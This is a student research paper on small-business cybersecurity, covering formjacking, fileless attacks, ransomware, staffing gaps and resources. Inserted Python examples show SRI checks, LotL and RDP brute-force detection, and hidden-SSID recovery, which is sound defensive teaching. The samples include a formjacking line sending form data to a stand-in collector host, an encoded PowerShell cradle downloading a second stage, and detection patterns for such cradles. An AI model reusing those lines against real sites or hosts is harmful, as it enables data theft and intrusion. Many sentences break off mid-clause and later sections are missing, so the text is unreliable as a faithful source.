Small and Midsize Businesses: Risk Assessment and Cyber Threat Fortification
by
Rowena Pagarigan
Spring 2019
Contents
Contents 2
Abstract 3
1. Introduction 4
2. SMB Definition 5
3. Small Business Profiles 6
3.1 Non-employer Profile 6
3.2 Employer Profile: Less Than 20 Employees 7
4. Risk Assessment 7
4.1 Formjacking 8
4.2 LotL and Fileless Attacks 9
4.3 Ransomware 11
5. Challenges 13
5.1 Insufficient Personnel and Budget 13
5.2 Decentralized Information 14
5.3 Shadow IT and Insider Threat 15
6. Plan of action 17
6.1 Framework and Guidelines 17
6.2 Talent and Training 18
6.3 Budget 20
6.4 BYOD and IoT 21
6.5 Continuous Education 21
7. Conclusion 22
References 24
Rowena Pagarigan - IS499 !3
Abstract
Small to medium businesses (SMBs) are increasingly faced with enterprise-size cyber threats.
With the rise of cybercrime-as-a-service platforms on the dark web, cyber attacks are no longer
limited to sophisticated hackers. Amateur cybercriminals with no coding experience can simply
purchase services in prepackaged kits and deploy them against chosen targets that have less than
optimal security infrastructure and policies in place. This research defines two types of small
business profile (employer and non-employer) in order to maintain the scope and clarity of the
overall impact that an incident or breach can have on these establishments. In order to support
the hypotheses that SMBs, in general, do not feel that they are a target for cybercriminals and
that both SMB profiles share similar challenges with minimal situational variations, the research
performed within this paper uses statements and data from a variety of sources: mainly, recent
white papers and surveys on the subject of SMBs and cybersecurity. This study also
provides general recommendations, or a plan of action, that the profiled businesses can implement to
1. Introduction
Cyber threats are often associated with attacks on larger companies, easily recognizable
not only in brand but also in reputation. This can be attributed to the media attention these
data breaches receive, which grows with the sheer number of individual accounts affected.
A large-scale data breach can cause multiple layers of damage to the target organization: a
tarnished reputation to recover from, the lost trust and confidence of all stakeholders, and the
financial burden of containing the incident as well as
functionalities. Depending on the sector and industry affected, another consequence could be
As an indirect result, small and medium-sized businesses might not feel that they are
likely targets of a cyber attack, since the perceived pay-off for the attacker would not be
"Thirty-five percent of employees and 51 percent of leaders are convinced their business
is not a target for cybercriminals" (Switchfast, 2018, p. 3) according to a report which surveyed
In truth, small businesses are just as susceptible to cyber attacks, if not more so. The EMEA
(Europe, Middle East, and Africa) Chief Strategist for Symantec, Sian John, stated that "nearly
forty-three percent of cybercrime targets small business" (Thompson, 2019a), more specifically
One of the key findings from the Internet Security Threat Report by Symantec (2018)
was "the US was the most targeted country in the past three years, accounting for 27 percent of
2. SMB Definition
The terms SMB (Small and Midsize Business) and SME (Small and Medium-sized
Enterprise) are often used interchangeably. Definitions of small business vary by source.
For the purpose of this paper, the definition will be narrowed down and redefined, in an effort
not only to remain within scope but also to provide greater value in terms of
There are 28.8 million small businesses in the US as reported by the Office of Advocacy
in the United States Small business Profile conducted by SBA.gov. This translates to 99.7% of
classification system using codes (North American Industry Classification System Codes) that
groups industries and subindustries (SBA.gov, 2016). Each category has a predefined
requirement either based on number of employees of a firm and / or average annual receipts.
This system was designed in order to give smaller firms an opportunity to compete with larger
corporations. For example, these standards are used as a basis to qualify for loans as well as
Office of Advocacy defines a small business as “an independent business having less than
500 employees” (US Small Business Administration Office of Advocacy, 2016). That qualifier
number does not make it seem like a small business at all. It is safe to assume that the term small
business still elicits the image of an old-fashioned mom and pop type of operation — typically
family operated and definitely composed of less than 500 employees. In New York State, small
business is defined as “one which is resident in this state, independently owned and operated, not
dominant in its field and employs one hundred or less persons” (NYState.gov, n.d.). According
to the last recorded small business survey results from 2016, almost 25 million small business
establishments had non-employer status (US Census Bureau, 2018). For those with employer
status, “firms with fewer than 20 workers made up 89.0 percent” (SBE Council, n.d.) based on
3. Small Business Profiles
This research focuses mainly on the cybersecurity vulnerabilities and challenges facing
small businesses with fewer than 20 employees, as well as those with non-employer status.
My initial assumption and hypothesis is that each segment has both common and varying
(yet closely related) sets of obstacles based on key factors unique to it: mainly, a lack of
resources, in terms of adequate staffing and ample financing, to support critical security operations
and maintenance as well as recovery efforts following an actual cybersecurity incident. Another
hypothesis is that small businesses assume they are targeted less than larger corporations by
cyber criminals. For the remainder of this paper, the segmented businesses will be referred to as
3.1 Non-employer Profile
Simply put, non-employers are any small business with no paid employees. Based on
data from the Non-employer Fact Sheet (SBA.gov, 2018a), the typical non-employer firm is
owned by a woman (40%), with a third owned by minorities; 16% of owners are under 35 years of age.
It has also been reported that one-third of non-employers surveyed did not need any startup
capital, and of the remaining two-thirds that did, 79% used their “personal or family
savings” (SBA.gov, 2018b). Lastly, “non-employer firms typically earn around $47,000
3.2 Employer Profile: Less Than 20 Employees
Exact data pertaining to small businesses with fewer than 20 employees is more
fragmented. For this reason, the data set used for this profile is based on the Babson
College report, The State of Small Business in America 2016. The survey answers were
drawn from a respondent pool of 1,679 small businesses across the United States with
the following qualifiers: participants must be “in business for two or more years, a minimum of
four employees, and annual revenues of $150,000 to $4 million” (Babson College, 2016, p. 40).
The majority of small business employer firms utilize financial institutions as their
primary source of capital. On average, the requested loan amount equates to $100,000. Actual
received funding is only typically $40,500. Another popular method of securing capital is via
credit cards even with its credit size limitations and the risks associated with high interest rates.
The typical business owner profile for this data set is as follows: Caucasian male, over
50 years of age.
4. Risk Assessment
According to the 2018 Data Breach Investigation Report, out of 53,000 incidents and
2,216 confirmed data breaches, 58% of the victims were small businesses (Verizon, 2018, p. 5).
Microsoft Office programs and Windows-based applications as the basis of SMB attacks in the
last 12 months (Bayern, 2018). Cyber attack methods typically go through their own lifecycle and
evolve faster than most businesses can protect themselves. A given attack tends to reach its
peak and is then replaced by a newer, more sophisticated way of reaching the same end-game. This
is a logical progression: once a cyber threat becomes mainstream, companies (both large and
small) are more willing and able to combat that specific type of attack. This means that cyber
criminals either need to move on to their next
4.1 Formjacking
Formjacking occurs when bad actors inject code into a website (typically an e-commerce
site) that captures payment information from unsuspecting customers. From the customer’s
perspective, it looks just like a normal transaction. By the time the user realizes their personal
data has been compromised, the damage has already been done.
"Smaller businesses are a target because they're less likely to have the more sophisticated
protections that larger sites have” (Rash, 2019a). Common entry points for this type of attack
are compromised third-party add-ons, such as surveys and chatbot features placed on the website
to help customers. Another way in is through server vulnerabilities or unauthorized access
using the web admin's credentials. It is important to note that formjacking is not restricted to
credit card theft. It is also used to steal anything that is submitted through a form, such as
user log-in credentials and other forms containing
Website owners can combat this by using SRI (Subresource Integrity) attributes on the
script and link tags that load third-party code. SRI lets the customer's browser check the integrity
of each tagged subresource before it runs. The site operator computes a cryptographic hash of the
exact file they reviewed (a hash function maps a file of any size to a short, fixed-length digest,
written as a string of alphanumeric characters, that changes completely if even one byte of the
file changes; it is not a signature, since anyone can compute it) and embeds that digest in the
tag's integrity attribute. When the browser fetches the script or stylesheet, it recomputes the
digest over the bytes it actually received and compares it with the digest in the tag. This catches
a file altered anywhere between the operator's review and the customer's browser, whether in
transit or on a compromised third-party host. If the digests differ, "the browser must refuse to
execute the script or apply the stylesheet, and must instead return a network error indicating that
fetching of that script or stylesheet failed" (Mozilla, n.d.). Two caveats apply. SRI only covers
resources that carry an integrity attribute, so a third-party script that in turn loads further scripts
is not covered unless those are tagged as well. And an attacker who can edit the site's own pages,
for example with the web admin's credentials, can simply change the attribute along with the
script, so SRI does not address that entry point.
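To make the mechanism concrete, the following added example (not part of the original paper) computes the integrity token a site operator would place on a third-party checkout script and then mirrors the browser's comparison against a constructed "formjacked" copy of the same script. The script contents, the cdn.example and collector.example hosts and the function names are assumptions made for this example.

```python
import base64
import hashlib

# Constructed sample resources for this example: the checkout script as the site operator
# reviewed and published it, and the same file with a skimmer appended by an attacker.
ORIGINAL_SCRIPT = b"document.getElementById('pay').addEventListener('submit', submitOrder);\n"
SKIMMER = b"fetch('https://collector.example/c', {method: 'POST', body: new FormData(document.forms[0])});\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + SKIMMER

# Digest algorithms browsers accept in integrity metadata (MD5 and SHA-1 are not accepted)
SRI_ALGORITHMS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
# Relative strength, used to pick the strongest algorithm present in an integrity attribute
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_digest(content: bytes, algorithm: str = "sha384") -> str:
    """Return the integrity token '<alg>-<base64 digest>' the site operator embeds in the tag."""
    digest = SRI_ALGORITHMS[algorithm](content).digest()
    return algorithm + "-" + base64.b64encode(digest).decode("ascii")


def script_tag(src: str, content: bytes, algorithm: str = "sha384") -> str:
    """Build the <script> tag for a third-party script. crossorigin is required for a
    cross-origin resource so the browser is allowed to read and verify the response bytes."""
    return ('<script src="%s" integrity="%s" crossorigin="anonymous"></script>'
            % (src, sri_digest(content, algorithm)))


def integrity_matches(fetched: bytes, integrity: str) -> bool:
    """Mirror the browser's decision: parse the space-separated tokens, ignore unknown
    algorithms and any '?options' suffix, keep only the tokens that use the strongest
    algorithm listed, and accept the resource if any of those matches the fetched bytes."""
    tokens = []
    for token in integrity.split():
        algorithm, _, value = token.partition("-")
        if algorithm in SRI_ALGORITHMS:
            tokens.append((algorithm, value.split("?", 1)[0]))
    if not tokens:
        return True  # no usable metadata: browsers load the resource unchecked
    strongest = max(STRENGTH[a] for a, _ in tokens)
    return any(STRENGTH[a] == strongest and sri_digest(fetched, a) == a + "-" + v
               for a, v in tokens)
```

The token is tied to one exact file, so the operator must pin a fixed version of the third-party script (a URL that serves "latest" will break as soon as the vendor updates it) and recompute the token whenever they deliberately upgrade. An integrity attribute containing only algorithms the browser does not recognize is treated as if it were absent, which is why the last case above returns true.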
Other mitigations that small businesses can perform include being mindful about which
third-party features they implement on their site. Regular maintenance should be scheduled
and performed, including website code reviews, web server security analysis, keeping operating
systems up to date and patched, and training staff on privileged user access. Outbound traffic
from the site should also be monitored, to ensure that customer data is going to the proper
destination rather than being rerouted to an unauthorized party.
Unfortunately, the business owners themselves can be the main reason for not addressing
this type of cyber threat. "Website owners are reluctant to take measures to prevent formjacking
because they're concerned that it might disrupt revenue flow” (Rash, 2019b).
4.2 LotL and Fileless Attacks
A rising trend in cyber attack techniques involves fileless malware. It has also been
referred to as a zero-footprint attack and as a living-off-the-land (LotL) attack, because it leaves
little or nothing on disk for traditional file scanning to find. The method uses trusted out-of-the-box
tools such as macros and various scripts to carry out an attack. It is able to remain in the infected
system and execute its malicious payload using native Microsoft functionality such as XML, Dynamic
Data Exchange (DDE) and Windows Management Instrumentation (WMI), then move laterally to other
machines within the network and repeat the same process. “In 2018, Microsoft Office files accounted
for almost half (48 percent) of all malicious email attachments, jumping up from just 5 percent in
2017” (Symantec, 2019, p. 17).
Based on the LotL attack’s method of delivery, one could say that a logical mitigation
would be to simply disable these native Windows functions. The issue is that while, in theory,
this would be effective in reducing the occurrence of fileless attacks, many of the executable
For instance, the DDE protocol “sends messages between applications that share data and
uses shared memory to exchange data between applications” (Kennedy & Satran, 2018). Used
by commonly accessed applications such as Microsoft Word, Excel, and Visual Basic, this
protocol “can be used to implement a broad range of application features that include linking to
Another Windows-native tool that has seen a significant spike in use by first-stage
malware is PowerShell, the scripting shell and automation engine that administrators use to
manage Windows systems and enterprise networks. It can be constrained rather than removed:
Microsoft publishes registry settings that turn off the Office DDE feature for users who do not need
it, and PowerShell script block logging records the commands that actually run, including the
decoded form of encoded ones, so that misuse is at least visible. Disabling the functionality
outright would disrupt business operations and
A successful campaign would play out as follows. Using spear phishing (emails that
target specific individuals or departments), a bad actor sends Microsoft Office lure
documents to multiple targets. One of the recipients opens the attachment and is prompted to
enable content. The user enables content, which activates the DDE field embedded in the
document; that field launches a command on the workstation, typically a shell or PowerShell
one-liner that runs in memory, and each stage invokes the next executable, designed either to
collect information (e.g., credentials) or to create a backdoor that can be reused to access that
workstation again. This is a typical characteristic of an Advanced Persistent Threat (APT), which
is “a prolonged and targeted cyberattack in which an intruder gains access to a network and
remains undetected for an extended period of
It has proven to be an effective mode of entry that starts with first-stage malware and
unleashes a second-stage payload using native tools. The threat is magnified by its ability to
hide in plain sight: having tasks and scripts run in memory obfuscates the actual exploits
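Because the chain described above runs entirely through legitimate binaries, the practical detection point is process-creation telemetry: an Office application should never need to start a shell, and a PowerShell command line that is base64-encoded or that pulls a second stage from the network deserves a look. The following added example (not from the paper) implements those three checks over constructed records in a simplified "host|user|parent|image|command line" layout loosely modelled on Sysmon event 1 fields. The hostnames, user names, the 203.0.113.7 address and the stage-two command are assumptions made for this example.

```python
import base64
import re
from dataclasses import dataclass

# Office applications whose child processes deserve scrutiny: a document should not need a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in binaries that LotL tradecraft commonly uses as the second stage.
LOTL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                 "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "wmic.exe", "msiexec.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b|FromBase64String", re.I)


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> ProcessEvent:
    """Parse one constructed 'host|user|parent|image|command line' record."""
    host, user, parent, image, cmd = line.rstrip("\n").split("|", 4)
    return ProcessEvent(host, user, parent, image, cmd)


def decode_encoded_command(command_line: str):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: ProcessEvent) -> list:
    """Return the reasons this event looks like LotL activity (empty list means nothing tripped)."""
    reasons = []
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    child = event.image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and child in LOTL_CHILDREN:
        reasons.append("office-spawned-" + child)
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        reasons.append("encoded-powershell")
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("download-cradle")
    elif child in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(event.command_line):
        reasons.append("download-cradle")
    return reasons


def scan(lines) -> list:
    """Return (event, reasons) for every record that trips at least one rule."""
    hits = []
    for line in lines:
        if line.strip():
            event = parse_line(line)
            reasons = assess(event)
            if reasons:
                hits.append((event, reasons))
    return hits


# Constructed sample records. The stage-two command is encoded here the same way an attacker
# would encode it, so the decoder above can be exercised on realistic input.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_LINES = [
    "ws01|jdoe|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    "C:\\Windows\\System32\\cmd.exe|cmd.exe /c powershell -nop -w hidden -enc " + _ENCODED,
    "ws01|jdoe|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\"
    "powershell.exe|powershell -nop -w hidden -enc " + _ENCODED,
    "ws02|admin|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\"
    "powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "ws03|asmith|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\"
    "WINWORD.EXE|\"WINWORD.EXE\" /n \"C:\\Users\\asmith\\invoice.docx\"",
]
```

The first record is the DDE scenario itself (Word starting cmd.exe, which starts an encoded, hidden PowerShell); the second is the same stage seen from the PowerShell process; the third is an administrator's scheduled backup script, which the rules correctly leave alone. In practice the parent-child rule is the high-value one, because it fires before the payload does anything, while the encoded-command check is what makes script block logging worth reviewing.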
4.3 Ransomware
While recent articles state that ransomware attacks have decreased and are being
replaced by newer methods, it is important to note that such articles are likely referring to the
Ransomware is malware designed to deny access to data, to threaten publication of sensitive
data, or both, unless a ransom is paid. It can affect mobile devices, individual systems or
workstations, or an entire network and all of its interconnected assets. The point of entry varies,
meaning whatever means necessary to get the payload delivered; it can arrive as a second stage
via LotL techniques. 79% of the participants in a Ponemon Institute report
(2018) cited phishing and some type of social engineering as the source of entry for their
Remote Desktop Protocol (RDP) passwords. RDP is a Microsoft protocol that provides an
interactive remote session on a Windows workstation or server. It is commonly used in office
settings for routine maintenance, troubleshooting, virtual desktops and applications, and it is
frequently left reachable directly from the internet. Attackers can brute-force weak passwords,
use purchased stolen credentials, or, once on one machine, harvest further credentials from its
memory with open-source tools such as Mimikatz.
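Brute forcing an exposed RDP service leaves a distinctive trail in the Windows Security log: many failed logons (event 4625) with logon type 10 from a single source address, followed by a successful one (event 4624) from that same address. The following added example (not from the paper) applies a sliding-window rule to constructed records in a "timestamp|event id|logon type|user|source ip" layout. The timestamps, account names and the 198.51.100.23, 203.0.113.9 and 192.0.2.10 addresses are assumptions made for this example.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624   # Windows Security event IDs
RDP_LOGON_TYPE = 10                            # LogonType 10 = RemoteInteractive (RDP)


@dataclass
class LogonEvent:
    time: datetime
    event_id: int
    logon_type: int
    user: str
    source_ip: str


def parse_logon_line(line: str) -> LogonEvent:
    """Parse one constructed 'timestamp|event id|logon type|user|source ip' record."""
    stamp, event_id, logon_type, user, source_ip = line.strip().split("|")
    return LogonEvent(datetime.fromisoformat(stamp), int(event_id), int(logon_type), user, source_ip)


def parse_logon_lines(lines) -> list:
    return [parse_logon_line(line) for line in lines if line.strip()]


def detect_rdp_bruteforce(events, threshold=10, window=timedelta(minutes=5)) -> list:
    """Sliding-window rule: alert once per source IP when it accumulates `threshold` failed RDP
    logons inside `window`, and again if an RDP logon from that IP then succeeds while the burst
    is still inside the window (the guessing worked, or a purchased credential did)."""
    recent_failures = defaultdict(deque)  # source_ip -> failure timestamps inside the window
    burst_flagged = {}                    # source_ip -> time the burst alert fired
    alerts = []
    for ev in sorted(events, key=lambda e: e.time):
        if ev.logon_type != RDP_LOGON_TYPE:
            continue
        failures = recent_failures[ev.source_ip]
        while failures and ev.time - failures[0] > window:
            failures.popleft()
        if ev.event_id == FAILED_LOGON:
            failures.append(ev.time)
            if len(failures) >= threshold and ev.source_ip not in burst_flagged:
                burst_flagged[ev.source_ip] = ev.time
                alerts.append(("rdp-bruteforce", ev.source_ip, len(failures), ev.time))
        elif ev.event_id == SUCCESSFUL_LOGON:
            flagged_at = burst_flagged.get(ev.source_ip)
            if flagged_at is not None and ev.time - flagged_at <= window:
                alerts.append(("rdp-success-after-bruteforce", ev.source_ip, ev.user, ev.time))
    return alerts


def _constructed_lines() -> list:
    """Constructed sample log: one source cycling through three account names every 15 seconds
    and finally getting in, one source with two stray failures, and one legitimate RDP logon."""
    base = datetime(2019, 4, 1, 2, 13, 0)
    guessed = ["administrator", "admin", "backup"]
    lines = [f"{(base + timedelta(seconds=15 * i)).isoformat()}|4625|10|{guessed[i % 3]}|198.51.100.23"
             for i in range(12)]
    lines.append(f"{(base + timedelta(minutes=3, seconds=10)).isoformat()}|4624|10|backup|198.51.100.23")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()}|4625|10|jdoe|203.0.113.9")
    lines.append(f"{(base + timedelta(minutes=1, seconds=40)).isoformat()}|4625|10|jdoe|203.0.113.9")
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()}|4624|10|jdoe|192.0.2.10")
    return lines


SAMPLE_LINES = _constructed_lines()
```

The threshold and window are deliberately parameters: a small office with a handful of remote users can afford a low threshold, while a larger one needs to tune it against the normal rate of mistyped passwords. The "success after burst" alert is the one to treat as an incident, because it is the moment the SamSam-style intrusion described next begins.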
All three techniques have been used to deploy the SamSam variant of ransomware on
organizations of all sizes. One of its larger victims is the IT Systems of the City of Atlanta in
which the group behind SamSam demanded $51k in bitcoin to restore essential and critical
services to the city. The City of Atlanta did not pay the ransom, but in order to regain control of
the hijacked system as well as to fortify it against similar attacks, it cost $2.7 million dollars with
nefarious groups and individuals have turned their attention to SMBs. "About 70 percent of
ransomware attacks in 2018 targeted small businesses, with an average ransom demand of
$116,000" (Davis | Health IT Security, 2019). Just recently, Michigan-based Brookside ENT &
Hearing Services became "the first health care provider in the nation to shut its doors for good
because of a ransomware attack” (Carlson, 2019). The two doctors who ran the clinic refused to
pay the $6,500 ransom to unlock their data which rendered their business inoperable. They have
since reported the incident to the FBI. While cybersecurity experts think their data might still be
recoverable, reputable data forensics experts and recovery team will need to access the infected
5. Challenges
The challenges faced by both employer and non-employer profiles are similar to large
enterprises — mainly constraints on resources as well as human error. However, these issues
The participants in the 2018 Ponemon Institute Study were asked what they thought were
the challenges that kept their organization's IT security from being fully effective. The top three
5.1 Insufficient Personnel and Budget
SMEs at the smaller end of the range typically have employees who wear many
hats and perform multiple, often overlapping, roles. The fewer the personnel, the more likely
each one is responsible and accountable for multiple processes. Insufficient staffing is directly
related to insufficient budgets. Employer Profiles will more than likely have only one individual
handling all IT-related duties, or outsource the task when needed, while Non-Employer Profiles
have no option but to handle it themselves or outsource if the budget allows. Cybersecurity
salaries typically fall at the higher end of the spectrum, far beyond what the Profiles are able to
pay. “Instead, they assign these responsibilities to an employee who works on these issues on a
kind of part-time basis” (US Senate: Committee on Small Business and Entrepreneurship, 2018,
p. 5-6). As a result, these personnel will not only experience obstacles related to overallocation
but will also be lacking the
Employees who are delegated cybersecurity duties on a part-time basis will not have the incentive
to obtain cybersecurity certifications that require both time and financial commitments.
the common reasons given by small businesses for not having a dedicated cybersecurity plan or
staff is “Cybersecurity is expensive and I cannot afford it” (Abate, 2018, as cited in US Senate:
Committee on Small Business and Entrepreneurship, 2018, p. 27). Cybersecurity expenses take
up a larger percentage of the Profiles’ operational budget than they do for larger firms, since the
Profiles do not have the economies of scale that a large organization has when acquiring
technology solutions per user or in bundles. Larger organizations have the advantage of
volume-based discounts.
5.2 Decentralized Information
Besides lacking qualified cybersecurity personnel, another factor that compounds the
challenge is not fully understanding what needs to be done. Unfortunately, seeking answers
online yields fragmented information that is either very difficult to find or too vague
to translate into practical activities. Before the Main Street Cybersecurity Act was signed into
law on August 14, 2018, the cybersecurity framework provided by the National Institute of
Standards and Technology (NIST) was the main resource available to small and large businesses
alike. The amount of information that the typical Profile business owner or part-time
cybersecurity staff would have to sift through was cumbersome and impractical. Other resources
are also prone to poorly organized information that is overwhelming to gather, synthesize,
and convert into organizational practices. For instance, the US Small Business Administration
(SBA) site mostly provides resources that lead to a handful of external links leading to other
Currently, the cybersecurity page on the FCC site is difficult to find from the home page
and can only be reached by searching for the term “cybersecurity” in the search box, which lists it
as the fourth result. The FCC page also provides a downloadable Cybersecurity Tip Sheet
that contains inaccurate advice, such as that hiding your router’s SSID helps secure your
Wi-Fi network. An SSID is merely an identifier for the access point and is not a security feature.
A determined attacker can easily discover a hidden SSID with a wireless network analyzer. “A non-
broadcast network is not undetectable. Non-broadcast networks are advertised in the probe
requests sent out by wireless clients and in the responses to the probe requests sent by wireless
APs” (Davies, 2007). This means that, depending on the device and its settings, hiding the
network name on the router can actually expose it, since every device configured to join a hidden
network has to ask for it by name in its probe requests, wherever that device happens to be.
More practical advice would be to ensure that the router is set to WPA2 encryption and not WEP, which can be
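The following added example (not from the paper) shows why hiding the SSID does not hide it. It builds three constructed 802.11 management frames: a beacon from an access point whose name is hidden (an empty SSID element), the probe request that a client which has saved that network sends to find it, and the access point's probe response, and parses them the way a passive wireless analyser would. The MAC addresses and the network name ShopFloor-Office are assumptions made for this example; the frame layout follows the 802.11 management header and information-element format.

```python
import struct

# 802.11 management header: frame control, duration, addr1, addr2, addr3, sequence control
MGMT_HEADER = struct.Struct("<HH6s6s6sH")
SUBTYPES = {4: "probe-request", 5: "probe-response", 8: "beacon"}
# Beacons and probe responses carry fixed fields (timestamp, interval, capability) before the elements
FIXED_FIELDS = {4: 0, 5: 12, 8: 12}
SSID_ELEMENT = 0
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes) -> dict:
    """Parse a beacon, probe request or probe response down to its SSID element."""
    fc, _duration, addr1, addr2, _addr3, _seq = MGMT_HEADER.unpack_from(frame, 0)
    frame_type, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if frame_type != 0 or subtype not in SUBTYPES:
        raise ValueError("not a beacon, probe request or probe response")
    body = frame[MGMT_HEADER.size + FIXED_FIELDS[subtype]:]
    elements, i = {}, 0
    while i + 2 <= len(body):                      # tagged parameters: id, length, value
        element_id, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        elements[element_id] = value
        i += 2 + length
    ssid = elements.get(SSID_ELEMENT)
    return {"subtype": SUBTYPES[subtype], "source": mac_str(addr2), "destination": mac_str(addr1),
            "ssid": None if ssid is None else ssid.decode("utf-8", "replace")}


def build_mgmt_frame(subtype: int, source: bytes, destination: bytes, bssid: bytes, ssid: bytes) -> bytes:
    """Assemble a constructed management frame (version 0, type 0) with SSID and supported-rates elements."""
    header = MGMT_HEADER.pack(subtype << 4, 0, destination, source, bssid, 0)
    fixed = bytes(FIXED_FIELDS[subtype])
    elements = bytes([SSID_ELEMENT, len(ssid)]) + ssid + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
    return header + fixed + elements


def recover_hidden_ssids(frames) -> list:
    """What a passive analyser does: beacons of a hidden network say nothing, but the client's
    probe request and the access point's probe response both carry the name in clear."""
    names = set()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed["subtype"] != "beacon" and parsed["ssid"]:
            names.add(parsed["ssid"])
    return sorted(names)


# Constructed sample traffic (locally administered MAC addresses, made up for this example)
AP_MAC = bytes.fromhex("02133700aa01")
CLIENT_MAC = bytes.fromhex("02133700bb02")
HIDDEN_BEACON = build_mgmt_frame(8, AP_MAC, BROADCAST, AP_MAC, b"")              # name withheld
CLIENT_PROBE = build_mgmt_frame(4, CLIENT_MAC, BROADCAST, BROADCAST, b"ShopFloor-Office")
AP_RESPONSE = build_mgmt_frame(5, AP_MAC, CLIENT_MAC, AP_MAC, b"ShopFloor-Office")
```

The client frame is the problem: a laptop configured for a hidden network sends that probe request at the airport and the coffee shop too, so the "hidden" name travels with the device and identifies where it has been. Encryption (WPA2) protects the traffic on the network; the name is not a secret either way.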
5.3 Shadow IT and Insider Threat
While the term shadow IT has an ominous, clandestine ring to it, it does not necessarily
refer to a secret band of personnel who are intentionally wreaking havoc on a company’s
setting which has not been approved for use or is beyond the scope of control of the IT
department or individual, without the knowledge of the IT or security group within the
These can include the use of physical storage devices (USB drive), messaging apps
(WhatsApp, Facebook Messenger), personal devices (mobile phone, tablet), as well as IoT
devices (Amazon Echo). If an organization’s staff brings in a mobile device and jumps on the
company’s wifi to minimize data charges, this is considered unauthorized unless the IT or
security department has an Acceptable Use Policy (AUP), a Mobile Device Management
(MDM), or a Bring Your Own Device (BYOD) Policy in place that specifically addresses it. It is
safe to assume that if most larger firms do not have a detailed mobile device management plan
established, then small businesses will certainly not have one in place.
productivity and collaboration, but these technologies add an attack surface that bad actors can
exploit to exfiltrate data. There is often a trade-off between convenience and security
Insider threat can refer to both malicious intent and human error. 60% of company data
breaches have been attributed to negligent employees or contractors (Ponemon Institute, 2018, p.
4). A secure workstation and network mean nothing if an employee writes their user credentials
on a sticky note and sticks it to their monitor for any passerby to see. Accessing work email or
documents from a mobile device connected to public wifi at a coffee shop is another example of
unintentional insider threat. “70% of SMB respondents have logged onto public wifi using their
work devices at places such as airports, airplanes and coffee shops” (AppRiver, 2019). Public
wifi allows cybercriminals to carry out man-in-the-middle (MitM) attacks, in which they position
themselves between the user (victim) and the open network (access point), for example by running
a rogue access point under the same name, and use tools to sniff the data passing between the
device and the network. Traffic to sites served over HTTPS stays encrypted even then; what the
attacker can read is anything sent over a plaintext protocol and anything a user hands over after
clicking through a certificate warning. In short, they are eavesdropping on and capturing the
transmission that occurs between user and access point to
6. Plan of action
Profiles need to make every effort to create a framework that is suitable for their
organization. There is a misconception that cybersecurity falls only within the purview of the
person responsible for IT duties when in actuality the entire firm and all of its personnel have to
be accountable. Profiles with an existing cybersecurity policy can use the following resources to
update their current framework. Those who do not have one in place can use any of the
cyber-related risks.
Profiles should create a cybersecurity policy or update an existing one. NIST has a Small
Business Cybersecurity Corner page with planning guides that can serve as templates. The page
The DHS Stop. Think. Connect.™ Toolkit located in the Publications Library currently
has a list of PDF guides organized by Cyber Topic at the bottom of the page. These provide a
good starting point for those with minimal IT experience who are seeking general information,
since the format is easily digestible and not overwhelmingly technical. At the top of the page,
materials are also divided by target audience. Clicking the small business link takes
the user to another page with a short list of additional resources, both internal and external links.
The National Cybersecurity and Communications Integration Center’s C3VP Page has a
Cybersecurity Resources Road Map with a helpful infographic divided in tiers containing links
National Initiative for Cybersecurity Careers and Studies (NICCS) has a Cybersecurity
Workforce Development Toolkit, a downloadable PDF with “resources and information you need
to plan, build, and advance your cybersecurity workforce” (NICCS, 2016, p. 1). This
Stakeholder Engagement and Cyber Infrastructure Resilience one sheet works well in
The National Cyber Security Alliance’s CyberSecure My Business™ page has well-
organized multimedia resources such as a Technology Checklist with relevant, accurate, and
actionable practical information. The same site has a Resources Library with helpful tip sheets
Better Business Bureau (BBB) has a useful page with a list of resources for small
Lastly, Profiles should explore additional cybersecurity resources provided by their state
government and local jurisdiction to supplement the ones mentioned above. As a general rule,
knowledge seekers should look for recency within the resources. Outdated and undated
6.2 Talent and Training
